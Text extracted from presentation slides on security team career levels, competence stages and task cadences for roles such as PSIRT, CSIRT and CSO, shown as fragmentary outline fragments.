Assessment Y i i iii
SIRT
• Jn SE
• SE
• Sr SE
• Architect
• Security Trusted Advisor
i. Basic level
ii. Advance level
iii. SME – Expert
219. 70295
©
6. SECURITY DESIGN
4. POLICY BUILDING
5. RESPONSE
8. OPERATIONS
1. TARGET
2. THREAT INTEL
3. SECURITY
7. TRAFFIC MANAGEMENT
9. ASSESSMENT
Jn SE SE Sr SE Architect TSA
1
2
3
4
1) You think you know but you don’t know
2) You know that you don’t know – learning
3) You don’t know that you know – value
4) You know that you know – Master
Time/
experience
Knowledge
220. 70295
©
PSIRT CSIRT STA Management (CSO)
One-time tasks
Daily tasks
Weekly tasks
Twice-monthly tasks
Monthly tasks
Quarterly tasks
Twice-yearly tasks
Yearly tasks
Per need tasks
Mission board